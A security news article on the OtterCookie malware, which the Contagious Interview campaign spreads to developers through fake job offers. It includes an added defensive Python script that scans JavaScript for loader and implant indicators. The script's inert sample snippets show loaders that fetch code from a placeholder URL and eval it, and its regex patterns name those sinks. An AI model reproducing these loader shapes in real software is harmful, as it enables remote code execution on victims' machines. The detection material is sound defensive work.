New 'OtterCookie' Malware Attacking Software Developers Through Fake Job Offers

Palo Alto Networks reported the Contagious Interview campaign in November 2023, a financially motivated attack targeting numerous organizations, unlike typical nation-state-sponsored attacks.

While the campaign is primarily associated with the BeaverTail and InvisibleFerret malware, SOCs have recently observed OtterCookie deployed within it.

OtterCookie exhibits behavior distinct from its predecessors, demonstrating the campaign's evolution and expanding threat landscape. This highlights the importance of continuous monitoring and threat intelligence updates for organizations to effectively mitigate the risks posed by Contagious Interview.

Execution Flow

Contagious Interview attacks, which exploit weaknesses in software development processes, are increasingly originating from diverse sources.

While Node.js projects and npm packages remain common attack vectors, attackers are now also targeting applications built with the Qt and Electron frameworks, which demonstrates active experimentation by the attackers to identify and exploit new weaknesses in the software supply chain.

Earlier analysis documented loaders that fetch JSON data, extract a "cookie" property, and execute it as JavaScript code, as well as a similar pattern in which loaders download JavaScript code directly: the request deliberately triggers a 500 HTTP status code, and the code is executed inside the resulting catch block.

This loader primarily delivers BeaverTail malware, though OtterCookie infections have also been noted, and instances of simultaneous OtterCookie and BeaverTail execution have been encountered.

Figure: JavaScript code

OtterCookie, a malware first observed in November 2024, uses Socket.IO for remote communication and can execute shell commands (command) and steal device information (whour) upon receiving remote commands via the socketServer function.

Analysis of the commands sent through the socketServer function revealed that OtterCookie collects cryptocurrency wallet keys from document, image, and cryptocurrency-related files and sends them to a remote server, using the ls and cat commands for environment reconnaissance.

Figure: shell commands

The OtterCookie version released in November has improved capabilities for stealing cryptocurrency keys compared to the version released in September.

While both versions can steal keys, the November version leverages remote shell commands for this purpose, whereas the September version relies on regular-expression-based checks inside the `checkForSensitiveData` function.

The November version also introduces clipboard monitoring using the `clipboardy` library to exfiltrate sensitive data from the victim's device to a remote location, a feature absent from the September OtterCookie.
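The loader shapes described earlier (a fetched "cookie" property evaluated as JavaScript, or an HTTP 500 response body executed inside a catch block) and the OtterCookie indicators named in this section (Socket.IO, the socketServer handler with its command and whour commands, checkForSensitiveData, clipboardy) can be folded into a static triage check for the JavaScript files of a package or "coding test" repository received from a recruiter. The script below is an added example, not code from the article, NTT or Palo Alto Networks; its sample snippets are constructed and inert (no real endpoints), and the indicator weights and verdict thresholds are assumptions chosen for illustration.

```python
"""
Static triage heuristics for JavaScript files in a Node.js project, covering
the loader patterns and the OtterCookie indicators named in the article.
Added example, not code from the article, NTT or Palo Alto Networks; the
weights and thresholds below are assumptions chosen for illustration.
"""
import re
from typing import Dict, List

# Sinks that turn a string into executable JavaScript.
EVAL_SINKS = re.compile(
    r"\b(?:eval|new\s+Function|vm\.run(?:InThisContext|InNewContext))\s*\("
)
# Opening of a catch block: statement form `catch (e) {` or promise form `.catch(e => {`.
CATCH_OPEN = re.compile(
    r"(?:\bcatch\b\s*(?:\(\s*[\w$]*\s*\))?\s*\{)"
    r"|(?:\.catch\(\s*(?:async\s+)?\(?[\w$]*\)?\s*=>\s*\{)"
)
# Names an eval argument tends to carry when it is the body of an HTTP response.
RESPONSE_DATA = re.compile(r"\b(?:res|resp|response|data|body)\b")

# Indicators taken from the article's description of OtterCookie: (pattern, description, weight).
OTTERCOOKIE_INDICATORS = [
    (r"""socket\.io-client|require\(\s*['"]socket\.io""", "Socket.IO client used for remote communication", 2),
    (r"\bsocketServer\b", "socketServer function (receives remote commands)", 3),
    (r"""['"]whour['"]""", "'whour' command (device information theft)", 3),
    (r"""['"]command['"]""", "'command' command (remote shell execution)", 1),
    (r"\bcheckForSensitiveData\b", "checkForSensitiveData (September variant key search)", 3),
    (r"\bclipboardy\b", "clipboardy dependency (November variant clipboard monitoring)", 2),
]
LOADER_WEIGHT = 4  # assumption: each loader finding counts as much as a strong indicator


def _balanced(source: str, start: int, open_ch: str, close_ch: str) -> str:
    """Text after the opener at source[start] up to its matching closer (naive; ignores strings)."""
    depth = 0
    for i in range(start, len(source)):
        if source[i] == open_ch:
            depth += 1
        elif source[i] == close_ch:
            depth -= 1
            if depth == 0:
                return source[start + 1:i]
    return source[start + 1:]


def catch_bodies(source: str) -> List[str]:
    """Body text of every catch block located by CATCH_OPEN."""
    return [_balanced(source, m.end() - 1, "{", "}") for m in CATCH_OPEN.finditer(source)]


def scan_loader_patterns(source: str) -> List[str]:
    """Heuristics for the two loader shapes described in the article."""
    findings: List[str] = []
    for m in EVAL_SINKS.finditer(source):
        arg = _balanced(source, m.end() - 1, "(", ")")
        if "cookie" in arg:
            findings.append("executes the 'cookie' property of fetched JSON as code")
        elif RESPONSE_DATA.search(arg):
            findings.append("builds executable code from HTTP response data")
    if any(EVAL_SINKS.search(body) for body in catch_bodies(source)):
        findings.append("code-execution sink inside a catch block (HTTP 500 trick)")
    return list(dict.fromkeys(findings))  # de-duplicate while keeping order


def scan_ottercookie_indicators(source: str) -> List[str]:
    """Descriptions of every OtterCookie indicator present in the source."""
    return [desc for pat, desc, _ in OTTERCOOKIE_INDICATORS if re.search(pat, source)]


def triage(source: str) -> Dict[str, object]:
    """Combine loader findings and indicators into a weighted score and verdict."""
    loader = scan_loader_patterns(source)
    indicators = scan_ottercookie_indicators(source)
    score = LOADER_WEIGHT * len(loader) + sum(
        w for pat, _, w in OTTERCOOKIE_INDICATORS if re.search(pat, source)
    )
    verdict = "high" if score >= 4 else "medium" if score >= 2 else "low"
    return {"loader_findings": loader, "indicators": indicators, "score": score, "verdict": verdict}


# Constructed, inert snippets shaped like the behaviours described in the article (no real endpoints).
SAMPLE_COOKIE_LOADER = """
const axios = require('axios');
axios.get(CONFIG_URL).then(r => { eval(r.data.cookie); });
"""
SAMPLE_CATCH_LOADER = """
const axios = require('axios');
async function run() {
  try { await axios.get(CONFIG_URL); }       // server deliberately answers 500
  catch (e) { eval(e.response.data); }
}
"""
SAMPLE_IMPLANT_SHAPE = """
const io = require('socket.io-client');
const clipboardy = require('clipboardy');
function socketServer(sock) {
  sock.on('command', () => {});
  sock.on('whour', () => {});
}
"""
SAMPLE_BENIGN = """
const axios = require('axios');
async function fetchConfig(url) {
  try { return (await axios.get(url)).data; }
  catch (e) { console.error('fetch failed', e.message); return null; }
}
"""

if __name__ == "__main__":
    for name, src in [("cookie loader", SAMPLE_COOKIE_LOADER), ("catch loader", SAMPLE_CATCH_LOADER),
                      ("implant shape", SAMPLE_IMPLANT_SHAPE), ("benign", SAMPLE_BENIGN)]:
        result = triage(src)
        print(f"{name:14} {result['verdict']:6} score={result['score']:2} "
              f"{result['loader_findings'] + result['indicators']}")
```

Run it over every `.js` file of a received repository (including `node_modules` and any `postinstall` scripts) before executing anything, and treat a "high" verdict as a reason to analyse the package in an isolated VM rather than on a developer workstation. The checks are regex-based with naive brace matching, so minified or obfuscated code will produce misses, and an `eval` of response data in legitimate code will produce false positives; the value is in cheap, repeatable screening, not in a definitive verdict.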

According to NTT, Contagious Interview, a threat actor group, has deployed a new malware variant called OtterCookie, which targets and steals browser cookies, potentially compromising user accounts.

The attack vector remains under investigation, but the threat actor is actively evolving its tactics, and researchers have observed attacks in Japan, indicating a broadening geographical scope.
